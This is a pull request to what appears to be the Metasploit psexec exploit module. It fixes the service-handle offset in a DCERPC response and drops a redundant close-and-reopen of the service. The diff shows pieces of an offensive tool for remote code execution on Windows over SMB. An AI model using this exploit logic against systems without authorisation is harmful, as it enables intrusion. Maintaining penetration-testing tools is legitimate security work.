### PR TITLE
Remove close/reopen of psexec

### DIFF
--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@@ -262,36 +262,8 @@ class Metasploit3 < Msf::Exploit::Remote
       begin
         response = dcerpc.call(0x0c, stubdata)
         if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
-          svc_handle = dcerpc.last_response.stub_data[0,20]
+          svc_handle = dcerpc.last_response.stub_data[4,20]
           svc_status = dcerpc.last_response.stub_data[24,4]
-        end
-      rescue ::Exception => e
-        print_error("Error: #{e}")
-        return
-      end
-
-      ##
-      # CloseHandle()
-      ##
-      print_status("Closing service handle...")
-      begin
-        response = dcerpc.call(0x0, svc_handle)
-      rescue ::Exception
-      end
-
-      ##
-      # OpenServiceW
-      ##
-      print_status("Opening service...")
-      begin
-        stubdata =
-          scm_handle +
-          NDR.wstring(servicename) +
-          NDR.long(0xF01FF)
-
-        response = dcerpc.call(0x10, stubdata)
-        if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
-          svc_handle = dcerpc.last_response.stub_data[0,20]
         end
       rescue ::Exception => e
         print_error("Error: #{e}")


### PR DESCRIPTION
If we just set svc_handle correctly the first time there is no reason to close and reopen the service.
